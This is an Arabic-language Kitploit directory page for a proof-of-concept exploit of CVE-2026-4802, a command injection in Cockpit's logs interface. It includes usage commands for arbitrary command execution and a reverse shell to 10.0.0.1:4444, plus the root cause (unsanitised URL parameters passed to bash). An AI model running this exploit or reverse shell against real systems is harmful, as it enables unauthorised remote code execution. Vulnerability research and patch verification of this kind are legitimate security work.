Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-4802 — إثبات مفهوم لاستغلال CVE-2026-4802، وهي ثغرة حقن أوامر في واجهة سجلات النظام في Cockpit، مما يتيح تنفيذ أوامر عشوائية وقذائف عكسية. | Kitploit
أدوات/GitHubGitHub/hakaioffsec/cve-2026-4802
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubhakaioffsec/cve-2026-4802

CVE-2026-4802

إثبات مفهوم لاستغلال CVE-2026-4802، وهي ثغرة حقن أوامر في واجهة سجلات النظام في Cockpit، مما يتيح تنفيذ أوامر عشوائية وقذائف عكسية.

عرض المستودع
41منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-4802 - تنفيذ التعليمات البرمجية عن بُعد عبر حقن الأوامر في Cockpit

إثبات مفهوم لاستغلال CVE-2026-4802، وهو تنفيذ تعليمات برمجية عن بُعد عبر حقن الأوامر في واجهة سجلات النظام في Cockpit (loadServiceFilters())

الإعداد

قم ببناء وتشغيل البيئة القابلة للاستغلال:

root@kitploit:~
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln

الاستخدام

root@kitploit:~
# تحقق مما إذا كان الهدف قابلًا للاستغلال
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check

# تنفيذ أوامر عشوائية
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"

# قشرة عكسية
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

الإصدارات القابلة للاستغلال

  • Cockpit (الإصدارات غير المُصححة التي تحتوي على pkg/systemd/logsJournal.jsx)

السبب الجذري

تقوم الدالة loadServiceFilters() في pkg/systemd/logsJournal.jsx ببناء أوامر الصدفة عن طريق دمج المصفوفات في سلاسل نصية مع إضافة مسافات فقط قبل تمريرها إلى /bin/bash -ec. تصل المعاملات التي يتحكم فيها المستخدم من جزء عنوان URL لصفحة السجلات (مثل --since=) إلى هذا المسار البرمجي دون تنقية، مما يسمح بحقن محارف الصدفة مثل استبدال الأوامر ($(...)).

إخلاء مسؤولية

هذه الأداة مخصصة لأغراض تعليمية وبحثية فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

QuimeraX Intelligence

QuimeraX Intelligence هي منصة متقدمة لإدارة سطح الهجوم الخارجي (EASM) واستخبارات التهديدات السيبرانية، متخصصة في تحديد الثغرات الحرجة في الأنظمة المعقدة. تراقب المنصة التهديدات الأمنية وتكتشفها وتنبه العملاء بشأنها بشكل استباقي، مما يضمن الشفافية والاستجابة السريعة للمخاطر المحتملة. يتلقى العملاء إشعارات فورية وتقارير شاملة إذا تم العثور على أنظمتهم قابلة للاستغلال، مما يمكنهم من اتخاذ إجراءات وقائية. اعرف المزيد

Hakai Security

Hakai Security هي شركة أمن سيبراني أسسها محترفون في مجال الأمن، ملتزمون بالتميز التقني. نقدم حلولًا أمنية مخصصة تشمل اختبار الاختراق المتقدم، ومحاكاة الفريق الأحمر الواقعية، وممارسات التطوير الآمن لحماية أصول عملائنا بشكل استباقي من التهديدات السيبرانية المتطورة.

المراجع

  • https://bugzilla.redhat.com/show_bug.cgi?id=2451155
  • https://access.redhat.com/security/cve/CVE-2026-4802
  • https://www.cve.org/CVERecord?id=CVE-2026-4802
تنزيل الأداة